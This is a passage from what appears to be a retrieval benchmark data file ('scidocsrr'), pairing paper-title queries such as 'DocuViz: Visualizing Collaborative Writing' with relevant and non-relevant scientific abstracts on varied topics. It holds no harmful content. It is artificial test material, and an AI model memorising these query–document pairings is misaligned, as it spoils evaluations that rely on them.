cysts and fibromas). The presence of pigment most commonly correlates with cutaneous metastases from melanoma. Given the limited body of knowledge regarding distinct clinical findings, we sought to better elucidate the dermoscopic patterns of cutaneous metastases, with the goal of using this diagnostic tool to help identify these lesions. We describe 20 outpatients with biopsy-proven cutaneous metastases secondary to various underlying primary malignancies. Their clinical presentation is reviewed, emphasizing the dermoscopic findings, as well as the histopathologic correlation.",
"title": ""
},
{
"docid": "080a097ddc53effd838494f40b7d39c2",
"text": "This paper surveys research on applying neuroevolution (NE) to games. In neuroevolution, artificial neural networks are trained through evolutionary algorithms, taking inspiration from the way biological brains evolved. We analyze the application of NE in games along five different axes, which are the role NE is chosen to play in a game, the different types of neural networks used, the way these networks are evolved, how the fitness is determined and what type of input the network receives. The paper also highlights important open research challenges in the field.",
"title": ""
},
{
"docid": "1efad72897441fb8b2f0fa4279a76e49",
"text": "MOTIVATION\nIdentifying cells in an image (cell segmentation) is essential for quantitative single-cell biology via optical microscopy. Although a plethora of segmentation methods exists, accurate segmentation is challenging and usually requires problem-specific tailoring of algorithms. In addition, most current segmentation algorithms rely on a few basic approaches that use the gradient field of the image to detect cell boundaries. However, many microscopy protocols can generate images with characteristic intensity profiles at the cell membrane. This has not yet been algorithmically exploited to establish more general segmentation methods.\n\n\nRESULTS\nWe present an automatic cell segmentation method that decodes the information across the cell membrane and guarantees optimal detection of the cell boundaries on a per-cell basis. Graph cuts account for the information of the cell boundaries through directional cross-correlations, and they automatically incorporate spatial constraints. The method accurately segments images of various cell types grown in dense cultures that are acquired with different microscopy techniques. In quantitative benchmarks and comparisons with established methods on synthetic and real images, we demonstrate significantly improved segmentation performance despite cell-shape irregularity, cell-to-cell variability and image noise. As a proof of concept, we monitor the internalization of green fluorescent protein-tagged plasma membrane transporters in single yeast cells.\n\n\nAVAILABILITY AND IMPLEMENTATION\nMatlab code and examples are available at http://www.csb.ethz.ch/tools/cellSegmPackage.zip.",
"title": ""
},
{
"docid": "f20e7c515d79f51fba660afc7cc3a7c5",
"text": "We present an approach for the joint extraction of entities and relations in the context of opinion recognition and analysis. We identify two types of opinion-related entities — expressions of opinions and sources of opinions — along with the linking relation that exists between them. Inspired by Roth and Yih (2004), we employ an integer linear programming approach to solve the joint opinion recognition task, and show that global, constraint-based inference can significantly boost the performance of both relation extraction and the extraction of opinion-related entities. Performance further improves when a semantic role labeling system is incorporated. The resulting system achieves F-measures of 79 and 69 for entity and relation extraction, respectively, improving substantially over prior results in the area.",
"title": ""
},
{
"docid": "c25a62b5798e7c08579efb61c35f2c66",
"text": "In this paper, we propose a new adaptive stochastic gradient Langevin dynamics (ASGLD) algorithmic framework and its two specialized versions, namely adaptive stochastic gradient (ASG) and adaptive gradient Langevin dynamics(AGLD), for non-convex optimization problems. All proposed algorithms can escape from saddle points with at most $O(\\log d)$ iterations, which is nearly dimension-free. Further, we show that ASGLD and ASG converge to a local minimum with at most $O(\\log d/\\epsilon^4)$ iterations. Also, ASGLD with full gradients or ASGLD with a slowly linearly increasing batch size converge to a local minimum with iterations bounded by $O(\\log d/\\epsilon^2)$, which outperforms existing first-order methods.",
"title": ""
},
{
"docid": "3dd266e768b989c24965a301984788a0",
"text": "Security analytics and forensics applied to in-vehicle networks are growing research areas that gained relevance after recent reports of cyber-attacks against unmodified licensed vehicles. However, the application of security analytics algorithms and tools to the automotive domain is hindered by the lack of public specifications about proprietary data exchanged over in-vehicle networks. Since the controller area network (CAN) bus is the de-facto standard for the interconnection of automotive electronic control units, the lack of public specifications for CAN messages is a key issue. This paper strives to solve this problem by proposing READ: a novel algorithm for the automatic Reverse Engineering of Automotive Data frames. READ has been designed to analyze traffic traces containing unknown CAN bus messages in order to automatically identify and label different types of signals encoded in the payload of their data frames. Experimental results based on CAN traffic gathered from a licensed unmodified vehicle and validated against its complete formal specifications demonstrate that the proposed algorithm can extract and classify more than twice the signals with respect to the previous related work. Moreover, the execution time of signal extraction and classification is reduced by two orders of magnitude. Applications of READ to CAN messages generated by real vehicles demonstrate its usefulness in the analysis of CAN traffic.",
"title": ""
}
] | scidocsrr |
9cf49ceadcd1c2384bea88ed7718f4f3 | DocuViz: Visualizing Collaborative Writing | [
{
"docid": "7838934c12f00f987f6999460fc38ca1",
"text": "The Internet has fostered an unconventional and powerful style of collaboration: \"wiki\" web sites, where every visitor has the power to become an editor. In this paper we investigate the dynamics of Wikipedia, a prominent, thriving wiki. We make three contributions. First, we introduce a new exploratory data analysis tool, the history flow visualization, which is effective in revealing patterns within the wiki context and which we believe will be useful in other collaborative situations as well. Second, we discuss several collaboration patterns highlighted by this visualization tool and corroborate them with statistical analysis. Third, we discuss the implications of these patterns for the design and governance of online collaborative social spaces. We focus on the relevance of authorship, the value of community surveillance in ameliorating antisocial behavior, and how authors with competing perspectives negotiate their differences.",
"title": ""
}
] | [
{
"docid": "79eb0a39106679e80bd1d1edcd100d4d",
"text": "Multi-agent predictive modeling is an essential step for understanding physical, social and team-play systems. Recently, Interaction Networks (INs) were proposed for the task of modeling multi-agent physical systems. One of the drawbacks of INs is scaling with the number of interactions in the system (typically quadratic or higher order in the number of agents). In this paper we introduce VAIN, a novel attentional architecture for multi-agent predictive modeling that scales linearly with the number of agents. We show that VAIN is effective for multiagent predictive modeling. Our method is evaluated on tasks from challenging multi-agent prediction domains: chess and soccer, and outperforms competing multi-agent approaches.",
"title": ""
},
{
"docid": "78d33d767f9eb15ef79a6d016ffcfb3a",
"text": "Healthcare scientific applications, such as body area network, require of deploying hundreds of interconnected sensors to monitor the health status of a host. One of the biggest challenges is the streaming data collected by all those sensors, which needs to be processed in real time. Follow-up data analysis would normally involve moving the collected big data to a cloud data center for status reporting and record tracking purpose. Therefore, an efficient cloud platform with very elastic scaling capacity is needed to support such kind of real time streaming data applications. The current cloud platform either lacks of such a module to process streaming data, or scales in regard to coarse-grained compute nodes. In this paper, we propose a task-level adaptive MapReduce framework. This framework extends the generic MapReduce architecture by designing each Map and Reduce task as a consistent running loop daemon. The beauty of this new framework is the scaling capability being designed at the Map and Task level, rather than being scaled from the compute-node level. This strategy is capable of not only scaling up and down in real time, but also leading to effective use of compute resources in cloud data center. As a first step towards implementing this framework in real cloud, we developed a simulator that captures workload strength, and provisions the amount of Map and Reduce tasks just in need and in real time. To further enhance the framework, we applied two streaming data workload prediction methods, smoothing and Kalman filter, to estimate the unknown workload characteristics. We see 63.1% performance improvement by using the Kalman filter method to predict the workload. We also use real streaming data workload trace to test the framework. Experimental results show that this framework schedules the Map and Reduce tasks very efficiently, as the streaming data changes its arrival rate. © 2014 Elsevier B.V. All rights reserved. ∗ Corresponding author at: Kavli Institute for Astrophysics and Space Research, Massachusetts Institute of Technology, Cambridge, MA 02139, USA. Tel.: +1",
"title": ""
},
{
"docid": "007558b122d9a8272cc0e26caf28e8fc",
"text": "A key problem in salient object detection is how to effectively exploit the multi-level saliency cues in a unified and data-driven manner. In this paper, building upon the recent success of deep neural networks, we propose a fully convolutional neural network based approach empowered with multi-level fusion to salient object detection. By integrating saliency cues at different levels through fully convolutional neural networks and multi-level fusion, our approach could effectively exploit both learned semantic cues and higher-order region statistics for edge-accurate salient object detection. First, we fine-tune a fully convolutional neural network for semantic segmentation to adapt it to salient object detection to learn a suitable yet coarse perpixel saliency prediction map. This map is often smeared across salient object boundaries since the local receptive fields in the convolutional network apply naturally on both sides of such boundaries. Second, to enhance the resolution of the learned saliency prediction and to incorporate higher-order cues that are omitted by the neural network, we propose a multi-level fusion approach where super-pixel level coherency in saliency is exploited. Our extensive experimental results on various benchmark datasets demonstrate that the proposed method outperforms the state-of the-art approaches.",
"title": ""
},
{
"docid": "0323cfb6e74e160c44e0922a49ecc28b",
"text": "Generating diverse questions for given images is an important task for computational education, entertainment and AI assistants. Different from many conventional prediction techniques is the need for algorithms to generate a diverse set of plausible questions, which we refer to as creativity. In this paper we propose a creative algorithm for visual question generation which combines the advantages of variational autoencoders with long short-term memory networks. We demonstrate that our framework is able to generate a large set of varying questions given a single input image.",
"title": ""
},
{
"docid": "d95e509c80d3eb2d67671579d6f585ab",
"text": "In this article we describe EANT2, Evolutionary Acquisition of Neural Topologies, Version 2 , a method that creates neural networks by evolutionary reinforcement learning. The structure of the networks is developed using mutation operators, starting from a minimal structure. Their parameters are optimised using CMA-ES, Covariance Matrix Adaptation Evolution Strategy , a derandomised variant of evolution strategies. EANT2 can create neural networks that are very specialised; they achieve a very good performance while being relatively small. This can be seen in experiments where our method competes with a different one, called NEAT, NeuroEvolution of Augmenting Topologies , to create networks that control a robot in a visual servoing scenario.",
"title": ""
},
{
"docid": "9b595be17a7501c9a30ba7f93d16f23d",
"text": "Various topic models have been developed for sentiment analysis tasks. But the simple topic-sentiment mixture assumption prohibits them from finding fine-grained dependency between topical aspects and sentiments. In this paper, we build a Hidden Topic Sentiment Model (HTSM) to explicitly capture topic coherence and sentiment consistency in an opinionated text document so as to accurately extract latent aspects and corresponding sentiment polarities. In HTSM, 1) topic coherence is achieved by enforcing words in the same sentence to share the same topic assignment and modeling topic transition between successive sentences; 2) sentiment consistency is imposed by constraining topic transitions via tracking sentiment changes; and 3) both topic transition and sentiment transition are guided by a parameterized logistic function based on the linguistic signals directly observable in a document. Extensive experiments on four categories of product reviews from both Amazon and NewEgg validate the effectiveness of the proposed model.",
"title": ""
},
{
"docid": "43e5146e4a7723cf391b013979a1da32",
"text": "The notions of disintegration and Bayesian inversion are fundamental in conditional probability theory. They produce channels, as conditional probabilities, from a joint state, or from an already given channel (in opposite direction). These notions exist in the literature, in concrete situations, but are presented here in abstract graphical formulations. The resulting abstract descriptions are used for proving basic results in conditional probability theory. The existence of disintegration and Bayesian inversion is discussed for discrete probability, and also for measure-theoretic probability — via standard Borel spaces and via likelihoods. Finally, the usefulness of disintegration and Bayesian inversion is illustrated in several examples.",
"title": ""
},
{
"docid": "e29f4224c5d0f921304e54bd1555cb38",
"text": "More and more sensitivity improvement is required for current sensors that are used in new area of applications, such as electric vehicle, smart meter, and electricity usage monitoring system. To correspond with the technical needs, a high precision magnetic current sensor module has been developed. The sensor module features an excellent linearity and a small magnetic hysteresis. In addition, it offers 2.5-4.5 V voltage output for 0-300 A positive input current and 0.5-2.5 V voltage output for 0-300 A negative input current under -40 °C-125 °C, VCC = 5 V condition.",
"title": ""
},
{
"docid": "378f33b14b499c65d75a0f83bda17438",
"text": "We present the design of a soft wearable robotic device composed of elastomeric artificial muscle actuators and soft fabric sleeves, for active assistance of knee motions. A key feature of the device is the two-dimensional design of the elastomer muscles that not only allows the compactness of the device, but also significantly simplifies the manufacturing process. In addition, the fabric sleeves make the device lightweight and easily wearable. The elastomer muscles were characterized and demonstrated an initial contraction force of 38N and maximum contraction of 18mm with 104kPa input pressure, approximately. Four elastomer muscles were employed for assisted knee extension and flexion. The robotic device was tested on a 3D printed leg model with an articulated knee joint. Experiments were conducted to examine the relation between systematic change in air pressure and knee extension-flexion. The results showed maximum extension and flexion angles of 95° and 37°, respectively. However, these angles are highly dependent on underlying leg mechanics and positions. The device was also able to generate maximum extension and flexion forces of 3.5N and 7N, respectively.",
"title": ""
},
{
"docid": "a830e1cc383236d9760bf6640c075eb9",
"text": "Graph data management tools are nowadays evolving at a great pace. Key drivers of progress in the design and study of data intensive systems are solutions for synthetic generation of data and workloads, for use in empirical studies. Current graph generators, however, provide limited or no support for workload generation or are limited to fixed use-cases. Towards addressing these limitations, we demonstrate gMark, the first domainand query languageindependent framework for synthetic graph and query workload generation. Its novel features are: (i) fine-grained control of graph instance and query workload generation via expressive user-defined schemas; (ii) the support of expressive graph query languages, including recursion among other features; and, (iii) selectivity estimation of the generated queries. During the demonstration, we will showcase the highly tunable generation of graphs and queries through various user-defined schemas and targeted selectivities, and the variety of supported practical graph query languages. We will also show a performance comparison of four state-ofthe-art graph database engines, which helps us understand their current strengths and desirable future extensions.",
"title": ""
},
{
"docid": "4d5d43c8f8d9bc5753f39e7978b23a0b",
"text": "The future of high-performance computing is likely to rely on the ability to efficiently exploit huge amounts of parallelism. One way of taking advantage of this parallelism is to formulate problems as \"embarrassingly parallel\" Monte-Carlo simulations, which allow applications to achieve a linear speedup over multiple computational nodes, without requiring a super-linear increase in inter-node communication. However, such applications are reliant on a cheap supply of high quality random numbers, particularly for the three main maximum entropy distributions: uniform, used as a general source of randomness; Gaussian, for discrete-time simulations; and exponential, for discrete-event simulations. In this paper we look at four different types of platform: conventional multi-core CPUs (Intel Core2); GPUs (NVidia GTX 200); FPGAs (Xilinx Virtex-5); and Massively Parallel Processor Arrays (Ambric AM2000). For each platform we determine the most appropriate algorithm for generating each type of number, then calculate the peak generation rate and estimated power efficiency for each device.",
"title": ""
},
{
"docid": "85e593e5a663346978272bf13a1d135a",
"text": "Methods. Two text analysis tools were used to examine the crime narratives of 14 psychopathic and 38 non-psychopathic homicide offenders. Psychopathy was determined using the Psychopathy Checklist-Revised (PCL-R). The Wmatrix linguistic analysis tool (Rayson, 2008) was used to examine parts of speech and semantic content while the Dictionary of Affect and Language (DAL) tool (Whissell & Dewson, 1986) was used to examine the emotional characteristics of the narratives.",
"title": ""
},
{
"docid": "b21356575aa37afdfb4862ac982b7757",
"text": "Distance or similarity measures are essential to solve many pattern recognition problems such as classification, clustering, and retrieval problems. Various distance/similarity measures that are applicable to compare two probability density functions, pdf in short, are reviewed and categorized in both syntactic and semantic relationships. A correlation coefficient and a hierarchical clustering technique are adopted to reveal similarities among numerous distance/similarity measures.",
"title": ""
},
{
"docid": "95d624c86fcd86377e46738689bb18a8",
"text": "EEG desynchronization is a reliable correlate of excited neural structures of activated cortical areas. EEG synchronization within the alpha band may be an electrophysiological correlate of deactivated cortical areas. Such areas are not processing sensory information or motor output and can be considered to be in an idling state. One example of such an idling cortical area is the enhancement of mu rhythms in the primary hand area during visual processing or during foot movement. In both circumstances, the neurons in the hand area are not needed for visual processing or preparation for foot movement. As a result of this, an enhanced hand area mu rhythm can be observed.",
"title": ""
},
{
"docid": "e483d914e00fa46a6be188fabd396165",
"text": "Assessing distance betweeen the true and the sample distribution is a key component of many state of the art generative models, such as Wasserstein Autoencoder (WAE). Inspired by prior work on Sliced-Wasserstein Autoencoders (SWAE) and kernel smoothing we construct a new generative model – Cramer-Wold AutoEncoder (CWAE). CWAE cost function, based on introduced Cramer-Wold distance between samples, has a simple closed-form in the case of normal prior. As a consequence, while simplifying the optimization procedure (no need of sampling necessary to evaluate the distance function in the training loop), CWAE performance matches quantitatively and qualitatively that of WAE-MMD (WAE using maximum mean discrepancy based distance function) and often improves upon SWAE.",
"title": ""
},
{
"docid": "6f0870195649231ceb47edc4e5ef59a5",
"text": "In 2014, Ungar et al. proposed Korz, a new computational model for structuring adaptive (object-oriented) systems [UOK14]. Korz combines implicit parameters and multiple dispatch to structure the behavior of objects in a multidimensional space. Korz is a simple yet expressive model which does not require special programming techniques such as the Visitor or Strategy pattern to accommodate a system for emerging contextual requirements. We show how the ideas of Korz can be integrated in a Prolog system by extending its syntax and semantics with simple meta-programming techniques. We developed a library, called mdp (multidi-mensional predicates) which can be used to experiment with multidimensional Prolog systems. We highlight its benefits with numerous scenarios such as printing debugging information, memoization, object-oriented programming and adaptive GUIs. In particular, we point out that we can structure and extend Prolog programs with additional concerns in a clear and concise manner. We also demonstrate how Prolog's unique meta-programming capabilities allow for quick experimentation with syntactical and semantical enhancement of the new, multidimensional model. While there are many open concerns, such as efficiency and comprehensibility in the case of larger systems, we will see that we can use the leverage of mdp and Prolog to explore new horizons in the design of adaptive systems.",
"title": ""
},
{
"docid": "591b0a6e8d690dd77485b13cb0b14a9f",
"text": "A human face provides a variety of different communicative functions such as identification, the perception of emotional expression, and lip-reading. For these reasons, many applications in robotics require tracking and recognizing a human face. A novel face recognition system should be able to deal with various changes in face images, such as pose, illumination, and expression, among which pose variation is the most difficult one to deal with. Therefore, face registration (alignment) is the key of robust face recognition. If we can register face images into frontal views, the recognition task would be much easier. To align a face image into a canonical frontal view, we need to know the pose information of a human head. Therefore, in this paper, we propose a novel method for modeling a human head as a simple 3D ellipsoid. And also, we present 3D head tracking and pose estimation methods using the proposed ellipsoidal model. After recovering full motion of the head, we can register face images with pose variations into stabilized view images which are suitable for frontal face recognition. By doing so, simple and efficient frontal face recognition can be easily carried out in the stabilized texture map space instead of the original input image space. To evaluate the feasibility of the proposed approach using a simple ellipsoid model, 3D head tracking experiments are carried out on 45 image sequences with ground truth from Boston University, and several face recognition experiments are conducted on our laboratory database and the Yale Face Database B by using subspace-based face recognition methods such as PCA, PCA+LAD, and DCV.",
"title": ""
},
{
"docid": "61998885a181e074eadd41a2f067f697",
"text": "Introduction. Opinion mining has been receiving increasing attention from a broad range of scientific communities since early 2000s. The present study aims to systematically investigate the intellectual structure of opinion mining research. Method. Using topic search, citation expansion, and patent search, we collected 5,596 bibliographic records of opinion mining research. Then, intellectual landscapes, emerging trends, and recent developments were identified. We also captured domain-level citation trends, subject category assignment, keyword co-occurrence, document co-citation network, and landmark articles. Analysis. Our study was guided by scientometric approaches implemented in CiteSpace, a visual analytic system based on networks of co-cited documents. We also employed a dual-map overlay technique to investigate epistemological characteristics of the domain. Results. We found that the investigation of algorithmic and linguistic aspects of opinion mining has been of the community’s greatest interest to understand, quantify, and apply the sentiment orientation of texts. Recent thematic trends reveal that practical applications of opinion mining such as the prediction of market value and investigation of social aspects of product feedback have received increasing attention from the community. Conclusion. Opinion mining is fast-growing and still developing, exploring the refinements of related techniques and applications in a variety of domains. We plan to apply the proposed analytics to more diverse domains and comprehensive publication materials to gain more generalized understanding of the true structure of a science.",
"title": ""
},
{
"docid": "8d7a7bc2b186d819b36a0a8a8ba70e39",
"text": "Recent stereo algorithms have achieved impressive results by modelling the disparity image as a Markov Random Field (MRF). An important component of an MRF-based approach is the inference algorithm used to find the most likely setting of each node in the MRF. Algorithms have been proposed which use Graph Cuts or Belief Propagation for inference. These stereo algorithms differ in both the inference algorithm used and the formulation of the MRF. It is unknown whether to attribute the responsibility for differences in performance to the MRF or the inference algorithm. We address this through controlled experiments by comparing the Belief Propagation algorithm and the Graph Cuts algorithm on the same MRF’s, which have been created for calculating stereo disparities. We find that the labellings produced by the two algorithms are comparable. The solutions produced by Graph Cuts have a lower energy than those produced with Belief Propagation, but this does not necessarily lead to increased performance relative to the ground-truth.",
"title": ""
},
{
"docid": "ab0c80a10d26607134828c6b350089aa",
"text": "Parkinson's disease (PD) is a neurodegenerative disorder with symptoms that progressively worsen with age. Pathologically, PD is characterized by the aggregation of α-synuclein in cells of the substantia nigra in the brain and loss of dopaminergic neurons. This pathology is associated with impaired movement and reduced cognitive function. The etiology of PD can be attributed to a combination of environmental and genetic factors. A popular animal model, the nematode roundworm Caenorhabditis elegans, has been frequently used to study the role of genetic and environmental factors in the molecular pathology and behavioral phenotypes associated with PD. The current review summarizes cellular markers and behavioral phenotypes in transgenic and toxin-induced PD models of C. elegans.",
"title": ""
}
] | scidocsrr |
9c2e817698cc2f3bde589ce08f60f265 | Nested Named Entity Recognition Revisited | [
{
"docid": "9b5207fc5beec8d2094d214cf8bfbded",
"text": "We present a novel model for the task of joint mention extraction and classification. Unlike existing approaches, our model is able to effectively capture overlapping mentions with unbounded lengths. The model is highly scalable, with a time complexity that is linear in the number of words in the input sentence and linear in the number of possible mention classes. Our model can be extended to additionally capture mention heads explicitly in a joint manner under the same time complexity. We demonstrate the effectiveness of our model through extensive experiments on standard datasets.",
"title": ""
}
] | [
{
"docid": "39861e2759b709883f3d37a65d13834b",
"text": "BACKGROUND\nDeveloping countries account for 99 percent of maternal deaths annually. While increasing service availability and maintaining acceptable quality standards, it is important to assess maternal satisfaction with care in order to make it more responsive and culturally acceptable, ultimately leading to enhanced utilization and improved outcomes. At a time when global efforts to reduce maternal mortality have been stepped up, maternal satisfaction and its determinants also need to be addressed by developing country governments. This review seeks to identify determinants of women's satisfaction with maternity care in developing countries.\n\n\nMETHODS\nThe review followed the methodology of systematic reviews. Public health and social science databases were searched. English articles covering antenatal, intrapartum or postpartum care, for either home or institutional deliveries, reporting maternal satisfaction from developing countries (World Bank list) were included, with no year limit. Out of 154 shortlisted abstracts, 54 were included and 100 excluded. Studies were extracted onto structured formats and analyzed using the narrative synthesis approach.\n\n\nRESULTS\nDeterminants of maternal satisfaction covered all dimensions of care across structure, process and outcome. Structural elements included good physical environment, cleanliness, and availability of adequate human resources, medicines and supplies. Process determinants included interpersonal behavior, privacy, promptness, cognitive care, perceived provider competency and emotional support. Outcome related determinants were health status of the mother and newborn. Access, cost, socio-economic status and reproductive history also influenced perceived maternal satisfaction. Process of care dominated the determinants of maternal satisfaction in developing countries. Interpersonal behavior was the most widely reported determinant, with the largest body of evidence generated around provider behavior in terms of courtesy and non-abuse. Other aspects of interpersonal behavior included therapeutic communication, staff confidence and competence and encouragement to laboring women.\n\n\nCONCLUSIONS\nQuality improvement efforts in developing countries could focus on strengthening the process of care. Special attention is needed to improve interpersonal behavior, as evidence from the review points to the importance women attach to being treated respectfully, irrespective of socio-cultural or economic context. Further research on maternal satisfaction is required on home deliveries and relative strength of various determinants in influencing maternal satisfaction.",
"title": ""
},
{
"docid": "a1c149b7130b4a30c33aacb4add34deb",
"text": "Supervised learning techniques construct predictive models by learning from a large number of training examples, where each training example has a label indicating its ground-truth output. Though current techniques have achieved great success, it is noteworthy that in many tasks it is difficult to get strong supervision information like fully ground-truth labels due to the high cost of data labeling process. Thus, it is desired for machine learning techniques to work with weak supervision. This article reviews some research progress of weakly supervised learning, focusing on three typical types of weak supervision: incomplete supervision where only a subset of training data are given with labels; inexact supervision where the training data are given with only coarse-grained labels; inaccurate supervision where the given labels are not always ground-truth.",
"title": ""
},
{
"docid": "04ba17b4fc6b506ee236ba501d6cb0cf",
"text": "We propose a family of learning algorithms based on a new form f regularization that allows us to exploit the geometry of the marginal distribution. We foc us on a semi-supervised framework that incorporates labeled and unlabeled data in a general-p u pose learner. Some transductive graph learning algorithms and standard methods including Suppor t Vector Machines and Regularized Least Squares can be obtained as special cases. We utilize pr op rties of Reproducing Kernel Hilbert spaces to prove new Representer theorems that provide theor e ical basis for the algorithms. As a result (in contrast to purely graph-based approaches) we ob tain a natural out-of-sample extension to novel examples and so are able to handle both transductive and truly semi-supervised settings. We present experimental evidence suggesting that our semiupervised algorithms are able to use unlabeled data effectively. Finally we have a brief discuss ion of unsupervised and fully supervised learning within our general framework.",
"title": ""
},
{
"docid": "76d27ae5220bdd692448797e8115d658",
"text": "Abstinence following daily marijuana use can produce a withdrawal syndrome characterized by negative mood (eg irritability, anxiety, misery), muscle pain, chills, and decreased food intake. Two placebo-controlled, within-subject studies investigated the effects of a cannabinoid agonist, delta-9-tetrahydrocannabinol (THC: Study 1), and a mood stabilizer, divalproex (Study 2), on symptoms of marijuana withdrawal. Participants (n=7/study), who were not seeking treatment for their marijuana use, reported smoking 6–10 marijuana cigarettes/day, 6–7 days/week. Study 1 was a 15-day in-patient, 5-day outpatient, 15-day in-patient design. During the in-patient phases, participants took oral THC capsules (0, 10 mg) five times/day, 1 h prior to smoking marijuana (0.00, 3.04% THC). Active and placebo marijuana were smoked on in-patient days 1–8, while only placebo marijuana was smoked on days 9–14, that is, marijuana abstinence. Placebo THC was administered each day, except during one of the abstinence phases (days 9–14), when active THC was given. Mood, psychomotor task performance, food intake, and sleep were measured. Oral THC administered during marijuana abstinence decreased ratings of ‘anxious’, ‘miserable’, ‘trouble sleeping’, ‘chills’, and marijuana craving, and reversed large decreases in food intake as compared to placebo, while producing no intoxication. Study 2 was a 58-day, outpatient/in-patient design. Participants were maintained on each divalproex dose (0, 1500 mg/day) for 29 days each. Each maintenance condition began with a 14-day outpatient phase for medication induction or clearance and continued with a 15-day in-patient phase. Divalproex decreased marijuana craving during abstinence, yet increased ratings of ‘anxious’, ‘irritable’, ‘bad effect’, and ‘tired.’ Divalproex worsened performance on psychomotor tasks, and increased food intake regardless of marijuana condition. Thus, oral THC decreased marijuana craving and withdrawal symptoms at a dose that was subjectively indistinguishable from placebo. Divalproex worsened mood and cognitive performance during marijuana abstinence. These data suggest that oral THC, but not divalproex, may be useful in the treatment of marijuana dependence.",
"title": ""
},
{
"docid": "dc76a4d28841e703b961a1126bd28a39",
"text": "In this work, we study the problem of anomaly detection of the trajectories of objects in a visual scene. For this purpose, we propose a novel representation for trajectories utilizing covariance features. Representing trajectories via co-variance features enables us to calculate the distance between the trajectories of different lengths. After setting this proposed representation and calculation of distances, anomaly detection is achieved by sparse representations on nearest neighbours. Conducted experiments on both synthetic and real datasets show that the proposed method yields results which are outperforming or comparable with state of the art.",
"title": ""
},
{
"docid": "3380a9a220e553d9f7358739e3f28264",
"text": "We present a multi-instance object segmentation algorithm to tackle occlusions. As an object is split into two parts by an occluder, it is nearly impossible to group the two separate regions into an instance by purely bottomup schemes. To address this problem, we propose to incorporate top-down category specific reasoning and shape prediction through exemplars into an intuitive energy minimization framework. We perform extensive evaluations of our method on the challenging PASCAL VOC 2012 segmentation set. The proposed algorithm achieves favorable results on the joint detection and segmentation task against the state-of-the-art method both quantitatively and qualitatively.",
"title": ""
},
{
"docid": "e7a22474a051cfd64e64e393d87ff1c9",
"text": "Sequence alignment is an important problem in computational biology. We compare two different approaches to the problem of optimally aligning two or more character strings: bounded dynamic programming (BDP), and divide-and-conquer frontier search (DCFS). The approaches are compared in terms of time and space requirements in 2 through 5 dimensions with sequences of varying similarity and length. While BDP performs better in two and three dimensions, it consumes more time and memory than DCFS for higher-dimensional problems.",
"title": ""
},
{
"docid": "4d5820e9e137c96d4d63e25772c577c6",
"text": "facial topography clinical anatomy of the face upsky facial topography: clinical anatomy of the face by joel e facial topography clinical anatomy of the face [c796.ebook] free ebook facial topography: clinical the anatomy of the aging face: volume loss and changes in facial topographyclinical anatomy of the face ebook facial anatomy mccc dmca / copyrighted works removal title anatomy for plastic surgery thieme medical publishers the face sample quintessence publishing! facial anatomy 3aface academy facial topography clinical anatomy of the face ebook download the face der medizinverlag facial topography clinical anatomy of the face liive facial topography clinical anatomy of the face user clinical anatomy of the head univerzita karlova pdf download the face: pictorial atlas of clinical anatomy clinical anatomy anatomic landmarks for localisation of j m perry co v commissioner internal bouga international journal of anatomy and research, case report anatomy and physiology of the aging neck the clinics topographical anatomy of the head eng nikolaizarovo crc title list: change of ownership a guide to childrens books about asian americans fractography: observing, measuring and interpreting nystce students with disabilities study guide tibca army ranger survival guide compax sharp grill 2 convection manual iwsun nursing diagnosis handbook 9th edition apa citation the surgical management of facial nerve injury lipteh the outermost house alongz cosmetic voted best plastic surgeon in dallas texas c tait a dachau 1933 1945 teleip select your ebook amazon s3 quotation of books all india institute of medical latest ten anatomy acquisitions british dental association lindens complete auto repair reviews mires department of topographic anatomy and operative surgery",
"title": ""
},
{
"docid": "4a87a9409a0b79434a22edde5c308dd8",
"text": "A model explaining several causes and consequences of negative teacher–pupil relationships was developed. Data from 109 teachers and 946 high school pupils was analyzed using path analysis. The results suggest that teachers who prefer a custodial approach of controlling pupils, who have lower morale due to school climate conditions and who are less likely to burn out, tend to adopt conflict-inducing attitudes towards pupils. The results also demonstrate a high incidence of educational, psychological and somatic complaints in students whose characterized teachers are perceived as more hostile in their attitude towards pupils. Implications of these findings are discussed. r 2002 Elsevier Science Ltd. All rights reserved.",
"title": ""
},
{
"docid": "019d465534b9229c2a97f1727c400832",
"text": "OBJECTIVE\nResearch on learning from feedback has produced ambiguous guidelines for feedback design--some have advocated minimal feedback, whereas others have recommended more extensive feedback that highly supported performance. The objective of the current study was to investigate how individual differences in cognitive resources may predict feedback requirements and resolve previous conflicted findings.\n\n\nMETHOD\nCognitive resources were controlled for by comparing samples from populations with known differences, older and younger adults.To control for task demands, a simple rule-based learning task was created in which participants learned to identify fake Windows pop-ups. Pop-ups were divided into two categories--those that required fluid ability to identify and those that could be identified using crystallized intelligence.\n\n\nRESULTS\nIn general, results showed participants given higher feedback learned more. However, when analyzed by type of task demand, younger adults performed comparably with both levels of feedback for both cues whereas older adults benefited from increased feedbackfor fluid ability cues but from decreased feedback for crystallized ability cues.\n\n\nCONCLUSION\nOne explanation for the current findings is feedback requirements are connected to the cognitive abilities of the learner-those with higher abilities for the type of demands imposed by the task are likely to benefit from reduced feedback.\n\n\nAPPLICATION\nWe suggest the following considerations for feedback design: Incorporate learner characteristics and task demands when designing learning support via feedback.",
"title": ""
},
{
"docid": "2b310a05b6a0c0fae45a2e15f8d52101",
"text": "Cyber threats and the field of computer cyber defense are gaining more and more an increased importance in our lives. Starting from our regular personal computers and ending with thin clients such as netbooks or smartphones we find ourselves bombarded with constant malware attacks. In this paper we will present a new and novel way in which we can detect these kind of attacks by using elements of modern game theory. We will present the effects and benefits of game theory and we will talk about a defense exercise model that can be used to train cyber response specialists.",
"title": ""
},
{
"docid": "cf3c9769496d51078904495d18198626",
"text": "Five different threshold segmentation based approaches have been reviewed and compared over here to extract the tumor from set of brain images. This research focuses on the analysis of image segmentation methods, a comparison of five semi-automated methods have been undertaken for evaluating their relative performance in the segmentation of tumor. Consequently, results are compared on the basis of quantitative and qualitative analysis of respective methods. The purpose of this study was to analytically identify the methods, most suitable for application for a particular genre of problems. The results show that of the region growing segmentation performed better than rest in most cases.",
"title": ""
},
{
"docid": "ba3f0e792b896b38f8844807a8d8e80e",
"text": "In this paper, we present a novel self-learning single image super-resolution (SR) method, which restores a high-resolution (HR) image from self-examples extracted from the low-resolution (LR) input image itself without relying on extra external training images. In the proposed method, we directly use sampled image patches as the anchor points, and then learn multiple linear mapping functions based on anchored neighborhood regression to transform LR space into HR space. Moreover, we utilize the flipped and rotated versions of the self-examples to expand the internal patch space. Experimental comparison on standard benchmarks with state-of-the-art methods validates the effectiveness of the proposed approach.",
"title": ""
},
{
"docid": "70374e96446dcc65a0f5fa64e439a472",
